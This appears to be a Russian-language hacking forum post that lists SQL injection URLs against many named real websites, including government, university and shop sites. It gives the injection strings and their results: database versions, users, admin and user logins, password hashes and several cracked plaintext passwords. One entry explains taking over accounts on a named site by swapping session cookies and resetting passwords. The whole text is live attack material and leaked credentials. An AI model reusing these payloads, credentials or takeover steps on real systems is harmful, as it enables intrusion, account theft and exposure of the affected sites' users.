Code: http://www.povituha.ru/news.php?id=9999+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--+ db: 5.0.32-Debian_7etch3-log name_db: povituha user: povit_gst@localhost ----------------------------- ----------------------------- Code: http://oculus.ru/blog.php?id=106&a=-9+union+select+unhex(hex(concat_ws(0x3a,version(),database(),user()))),2,3,4,5,6,7--+ db: 4.1.14-log name_db: oculus user: oculus@localhost
Code: http://hcch.e-vision.nl/index_en.php?act=status.accept&mid=262+union+select+1,2,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),4,5,6,7,8/* version():4.1.11-Debian_4sarge7-log database():hcch user():hcch@localhost Code: http://hcch.e-vision.nl/index_en.php?act=status.accept&mid=262+union+select+1,2,unhex(hex(concat(user,0x3a,password))),4,5,6,7,8+from+mysql.user/* root:066bc62049564980 debian-sys-maint:29fd31b70de75eef loonsom:30acaa6013620a70 hcch:49486a7f003c5faa mp3act:00e4b206540aea24 rwv:7afa5b201c1b6669 vtiger:7888cda30bcc3c16 vtiger_sport:2db1898a5bbad4ca newwavei:5f5a29b54316b43f stayokay:5a0f66d4277d854b kees:6e15cff222b5b0dc incadat:177de41f23fdd5ae vaneijzeren:11105af933ee8348
Code: http://scriptorium.serve-it.nl/view.php?sid=54+union+select+1,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/* version():4.1.12-standard database():serve_scriptorium user():serve_serve@localhost
pr4 Code: http://imperial.ca.gov/section.php?id=17+and+ascii(substring([COLOR=DarkGreen]y[/COLOR]()),1,1))=[COLOR=DarkRed]x[/COLOR] y1=version y2=user x1=53,46,48,46,48,55 x2=114,105,98,97,114,100,111,104,100,122,64,108,111,99,97,108,104,111,115,116 version() - 5.0.07 user() - ribardohdz@localhost
worldstart.com pr=5 Code: http://worldstart.com/kb/answers.php?sku=3917+and+1=0+union+select+1,2,3,concat_ws(0x20,user(),database(),version(),@@basedir,@@datadir,@@tmpdir,@@version_compile_os),5+--%20-- Code: [email protected] kb 5.0.45 /usr/ /var/lib/mysql/ /tmp/ redhat-linux-gnu
geometria.ru geometria:[email protected]:5.0.45-log Идем в information_schema. Интересная таблица "user" Мне понравились колонки:login,password =) Выводим первые 500 из базы.Всего на данные момент 176055 рабочих аакаунтов. Пароль захеширован хз чем может md5 с солью,но колонку с ней не нашел,а нам и не нада.)) И так выбираем пользователя,например "Fusion". Fusion:mfjrhju2pua8lj4ob7k3n20e81 Итакс,хорошо.Дальше если зареганы заходим в редактирование cookies.Меняем PHPSESSID,ок,F5 и вот мы под чужим логином. Жмем на наш логин попадаем на страницу с инфой пользователя,жмем на изменить данные.Фишка в том что при смене пароля не запрашивает старый пароль) поэтому 2 раза вводим новый пароль потом "изменить" и все.=)
http://www.uoit.ca/calendar/0405/info-display.php?ID=-83/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**//* Database Version: 4..20-standard Database name: uoitcalendar0405 User name: uoitcalendar0405@localhost http://www.quantumbindery.ca/bindery-equipment/equipment-display.php?id=-10/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**//* Database Version: 4.1.22-standard Database name: quantum_products User name: quantum_leap@localhost
Code: http://ladyfitness.ru/php/photo.php3?id=999+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8--+ db: 5.0.51 name_db: ladyfit user: db_user@localhost os: portbld-freebsd6.2 table: users db: pun_bb -=admin=- log: admin pass: 36058a75bd500c96eeaca789e9f1fe1d758e7f66 -=users=- +limit+x,x--+
греческий шоп (pr = 3) Code: http://www.roses2u.gr/detail.php?flowerid=-69+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5+-- user() = roses2u_roses@localhost database() = roses2u_roses version() = 5.0.67-community Code: http://www.roses2u.gr/detail.php?flowerid=-69+union+select+1,2,3,concat_ws(0x3a,username,password),5+from+users+-- username = roses2u password = rc4#7! пародия на админку: http://roses2u.gr/console/
<<Информационно-справочная служба>> Code: http://help-nova.ru/index.php?cat=1&subcat=-164+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5-- db: 5.0.51a-community-log name_db: helpnov_help user: helpnov_help@localhost os: redhat-linux-gnu table: pmd_admin -=admin=- log: admin pass: savva table: pmd_users Code: http://help-nova.ru/index.php?cat=1&subcat=-164+union+select+1,2,3,concat_ws(0x3a,login,pass),5+from+pmd_users--+ и все юзверы.... -------------------------------------- <<HeppyWoman>> Code: http://happywoman.com.ua/article&pid=571&parent=999'+union+select+concat_ws(0x3a,table_name,table_schema)+from+information_schema.columns+where+column_name+like+0x70617373776f7264--+ db: 5.0.75 name_db: happywoman user: dbhappywoman@localhost os: portbld-freebsd7.0 ------------------------------- http://happywoman.com.ua/admin/ ------------------------------- table: cns_users db: cnstats -=admins=- log: admin pass: 2E6975A9DE99EA679B328195AB5B3AB5BA22FD8C -=users=- log: fortest pass: fortest +limit+x,x--+
http://www.beattyhigh.net/scrapbook/photo.php?id=11/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10/**/LIMIT/**/1,1/* Database Version: 4.1.25-Debian_mt1 Database name: brightideasutah_com_-_bhsgen User name: [email protected] 4 usera в таблице users idass:user 1:starwars:icem 13:friday:admin 24:stinger:webed 25:hotdog:richicem
Database Version: 5.0.32-Debian_7etch8 Database name: engine User name: [email protected] Login: admin Pass: fightingf1sh
Pagerank: 6 http://www.asia-anf.org/NewsDetails.php?NewsId=-166+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6-- Database Version: 4.1.22-standard Database name: asinanoo_anf User name: asinanoo_admin@localhost
PR - 5 Code: http://www.hockeyboss.ru/index.php?action=0&id=42+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4,5,6-- Database Version : 5.0.32-Debian_7etch6-log Database name : superligaDB User name : [email protected] admin : Code: http://www.hockeyboss.ru/index.php?action=0&id=42+union+select+1,2,concat_ws(0x3a,username,passwd),4,5,6+from+users+where+username=ch ar(97,100,109,105,110)-- Code: Admin:*10C76DCEABF030E275D0809D5F6C5438CD671BA1 - [COLOR=Red]957762[/COLOR]
Database Version: 4.0.27-max-log Database name: db189841794 User name: [email protected] Database Version: 5.0.67-log Database name: shoot1 User name: [email protected] 4 админка competitions:2de809f72949339e849d2b73e39576fa : comps@2468 - marketing:eb75757f1517f30eaecd258f2d746e02 : ??? - claire:67d0f2f380bf297e35c354191caec8bd : ??? - innovative:4a58d6a4040d95671dfcb74f1fbaf592 : ???
Code: http://www.tennoil.com/newsletter.php?id=-252+union+select+1 Database Version: 4.1.12 Database name: tennoil User name: tennoil@localhost Code: http://www.israelunitycoalition.org/news/newsletter.php?id=-121633+union+select+1,2,3,concat(user(),0x3a,version()),5,6,7,8,9,0,1/* Израиль pr5 ucing@localhost:5.0.45 Code: http://anthenv.web.arizona.edu/Newsletter.php?Id=53333+union+select+1,concat(Username,0x3a,Password),3,UserId,5,6+from+Users EDU Database Version: 5.0.22 Database name: anthenv User name: anthenv@localhost - username:sdowney pass:chaos95 http://anthenv.web.arizona.edu/login.php не подходит чо то
http://www.neuroscience-tuebingen.de/research-groups/display.php?type=Department&id=-37/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* User name: neuroscience@localhost Database Version: 5.0.18 Database name: dbneuroscience
attajdid.info PageRank 7 Code: http://www.attajdid.info/def.asp?codelangue=6&infoun=48015+UNION+SELECT+'0','1',concat_ws(0x3a,version(),user()),'3','4','5','6','7','8','9','10','11'%20,'12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36'-- 5.0.67-community-nt:zaherland@localhost
Pagerank: 5 http://www.billybishop.org/newsfull.php?NewsID=-19+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),14,15,16,17,18,19 Database Version: 4.1.20 Database name: osmuseums User name: mrailbishop@localhost Os : redhat-linux-gnu
